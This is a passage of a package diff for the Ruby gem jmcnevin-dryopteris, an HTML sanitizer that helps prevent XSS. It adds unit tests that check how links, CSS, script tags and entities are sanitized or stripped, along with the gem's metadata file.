+       <a href='jimbo://jim.jim/'>this link should have its href removed because of illegal url</a>
+       <a href='http://jim.jim/'>this link should be fine</a>
+     HTML
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     nodes = sane.xpath("//a")
+     assert_nil nodes.first.attributes['href']
+     assert nodes.last.attributes['href']
+   end
+
+   def test_css_sanitization
+     html = "<p style='background-color: url(\"http://foo.com/\") ; background-color: #000 ;' />"
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     assert_match(/#000/, sane.inner_html)
+     assert_no_match(/foo\.com/, sane.inner_html)
+   end
+
+   def test_fragment_with_no_tags
+     assert_equal "This fragment has no tags.", Dryopteris.sanitize("This fragment has no tags.")
+   end
+
+   def test_fragment_in_p_tag
+     assert_equal "<p>This fragment is in a p.</p>", Dryopteris.sanitize("<p>This fragment is in a p.</p>")
+   end
+
+   def test_fragment_in_a_nontrivial_p_tag
+     assert_equal " \n<p>This fragment is in a p.</p>", Dryopteris.sanitize(" \n<p foo='bar'>This fragment is in a p.</p>")
+   end
+
+   def test_fragment_in_p_tag_plus_stuff
+     assert_equal "<p>This fragment is in a p.</p>foo<strong>bar</strong>", Dryopteris.sanitize("<p>This fragment is in a p.</p>foo<strong>bar</strong>")
+   end
+
+   def test_fragment_with_text_nodes_leading_and_trailing
+     assert_equal "text<p>fragment</p>text", Dryopteris.sanitize("text<p>fragment</p>text")
+   end
+
+   def test_whitewash_on_fragment
+     html = "safe<frameset rows=\"*\"><frame src=\"http://example.com\"></frameset> <b>description</b>"
+     whitewashed = Dryopteris.whitewash_document(html)
+     assert_equal "<p>safe</p><b>description</b>", whitewashed
+   end
+
+ end
data/test/test_strip_tags.rb ADDED
@@ -0,0 +1,40 @@
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
+
+ class TestStripTags < Test::Unit::TestCase
+
+   def test_nil
+     assert_nil Dryopteris.strip_tags(nil)
+   end
+
+   def test_empty_string
+     assert_equal Dryopteris.strip_tags(""), ""
+   end
+
+   def test_return_empty_string_when_nothing_left
+     assert_equal "", Dryopteris.strip_tags('<script>test</script>')
+   end
+
+   def test_removal_of_all_tags
+     html = <<-HTML
+       What's up <strong>doc</strong>?
+     HTML
+     stripped = Dryopteris.strip_tags(html)
+     assert_equal "What's up doc?".strip, stripped.strip
+   end
+
+   def test_dont_remove_whitespace
+     html = "Foo\nBar"
+     assert_equal html, Dryopteris.strip_tags(html)
+   end
+
+   def test_dont_remove_whitespace_between_tags
+     html = "<p>Foo</p>\n<p>Bar</p>"
+     assert_equal "Foo\nBar", Dryopteris.strip_tags(html)
+   end
+
+   def test_removal_of_entities
+     html = "<p>this is &lt; that &quot;&amp;&quot; the other &gt; boo&apos;ya</p>"
+     assert_equal 'this is < that "&" the other > boo\'ya', Dryopteris.strip_tags(html)
+   end
+
+ end
metadata ADDED
@@ -0,0 +1,77 @@
+ --- !ruby/object:Gem::Specification
+ name: jmcnevin-dryopteris
+ version: !ruby/object:Gem::Version
+   version: 0.1.2
+ platform: ruby
+ authors:
+ - Bryan Helmkamp
+ - Mike Dalessio
+ autorequire:
+ bindir: bin
+ cert_chain: []
+
+ date: 2009-02-10 00:00:00 -08:00
+ default_executable:
+ dependencies:
+ - !ruby/object:Gem::Dependency
+   name: nokogiri
+   type: :runtime
+   version_requirement:
+   version_requirements: !ruby/object:Gem::Requirement
+     requirements:
+     - - ">"
+       - !ruby/object:Gem::Version
+         version: 0.0.0
+     version:
+ description: Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
+ email:
+ - bryan@brynary.com
+ - mike.dalessio@gmail.com
+ executables: []
+
+ extensions: []
+
+ extra_rdoc_files: []
+
+ files:
+ - README.markdown
+ - VERSION.yml
+ - lib/dryopteris
+ - lib/dryopteris/rails_extension.rb
+ - lib/dryopteris/sanitize.rb
+ - lib/dryopteris/whitelist.rb
+ - lib/dryopteris.rb
+ - test/test_basic.rb
+ - test/test_strip_tags.rb
+ - test/helper.rb
+ - test/html5/test_sanitizer.rb
+ has_rdoc: true
+ homepage: http://github.com/brynary/dryopteris/tree/master
+ licenses:
+ post_install_message:
+ rdoc_options:
+ - --inline-source
+ - --charset=UTF-8
+ require_paths:
+ - lib
+ required_ruby_version: !ruby/object:Gem::Requirement
+   requirements:
+   - - ">="
+     - !ruby/object:Gem::Version
+       version: "0"
+   version:
+ required_rubygems_version: !ruby/object:Gem::Requirement
+   requirements:
+   - - ">="
+     - !ruby/object:Gem::Version
+       version: "0"
+   version:
+ requirements: []
+
+ rubyforge_project:
+ rubygems_version: 1.3.5
+ signing_key:
+ specification_version: 2
+ summary: HTML sanitization using Nokogiri
+ test_files: []
+